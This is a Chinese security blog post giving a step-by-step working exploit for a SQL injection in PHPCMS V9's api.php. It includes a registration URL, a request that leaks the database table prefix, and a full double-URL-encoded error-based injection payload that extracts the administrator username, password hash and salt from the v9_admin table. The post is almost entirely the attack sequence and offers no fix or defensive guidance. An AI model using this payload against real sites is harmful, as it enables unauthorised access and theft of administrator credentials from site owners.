PHPCMS V9最新Sql注入0day漏洞利用方法 爆管理员密码

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

漏洞形成原因就不多说了,文件在phpcms/api.php ,有兴趣的盆友可以多去挖一挖phpcms的洞子。

主要利用过程:

第一步:注册一个用户

http://www.wooyun.in/index.php?m=member&c=index&a=register&siteid=1

第二步:访问api文件,爆出表前缀,默认的表前缀为v9

http://www.wooyun.in/api.php?op=add_favorite&url=wooyun.in&title=%2527

PHPCMS V9最新Sql注入0day漏洞利用方法 爆管理员密码

第三步:爆出用户密码(下面红色的字体就是要修改的表前缀)

http://www.wooyun.in/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280×23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

 

如图:

PHPCMS V9最新Sql注入0day漏洞利用方法 爆管理员密码

本文地址:http://www.wooyun.in/post/14.html

Tags:

PHPCMS V9 0day, PHPCMS V9注入,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
PHPCMS V9最新Sql注入0day漏洞利用方法 爆管理员密码